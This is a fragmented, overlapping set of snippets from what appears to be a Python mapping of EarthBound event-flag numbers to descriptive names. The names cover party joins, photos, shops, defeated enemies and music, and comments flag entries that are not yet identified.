'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8',", "472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no on death.", "'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538", "'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED',", "'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY',", "'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when", "'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE',", "601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', #", "'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded mine?)", "'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at Fourside Bridge?)", "'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP',", "palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1',", "562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568:", "566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', #", "'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE',", "728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734:", "729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735:", "'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342:", "and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING',", "'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8',", "Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after Apple Kid calls", "690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696:", "705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711:", "'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue", "'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE',", "'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS',", "252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258:", "'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE',", "502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508:", "423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429:", "'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518: 'GUARDIAN_MOLE_TEXT_1', 519: 'GUARDIAN_MOLE_TEXT_2',", "351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357:", "'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT',", "470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles", "Got kicked out of Pokey's Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627:", "87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93:", "25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31:", "Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY',", "'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC',", "'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway Five Tour Bus???) 748:", "Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132:", "(Something about Venus show about to start?) # 680 (Something about Venus show", "DX defeated. One of them might be responsible only for palette changes, maybe)", "195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins)", "# 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543:", "293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297:", "\"Fancy Pokey\" in the Monotoli Building) -- Got kicked out of Pokey's Room", "Tracy after defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772:", "'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP',", "'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS',", "'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115:", "'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE',", "6: 'TEMP_6', 7: 'TEMP_7', 8: 'TEMP_8', 9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12:", "77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83:", "'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First", "'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway Five Tour", "'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN',", "'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3',", "112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118:", "(???) # 161 (???) # 162 (???) # 163 (???) # 164 (???)", "158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) # 161 (???) # 162 (???)", "'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after Apple Kid calls you about", "#851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving in Threed,", "One of them might be responsible only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED',", "'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT',", "711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717:", "126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for shyness book\"? This flag is", "'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't actually", "'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED',", "'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY',", "(Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER',", "NPC attached to the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389:", "288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294:", "you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED',", "'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173:", "'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349: 'JUST_WOKE_UP_FROM_MAGICANT', 350: 'USED_ELEVATOR', 351: 'HH_HQ_CULTIST_1_DEFEATED', 352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED',", "'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS',", "Paula joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204:", "'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534:", "# 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154:", "'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE',", "'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310:", "279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How does", "323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329:", "Maxwell doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2',", "about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???)", "'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID',", "about the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the", "'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC',", "656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662:", "flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't", "98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', #", "541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547:", "617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB',", "about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP',", "536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541:", "501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507:", "Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752:", "491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497:", "425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', #", "569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP',", "248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254:", "the script for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED',", "26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32:", "290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296:", "'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309:", "journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156", "(???) # 157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???) #", "409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415:", "(???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112:", "# 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???) 382: 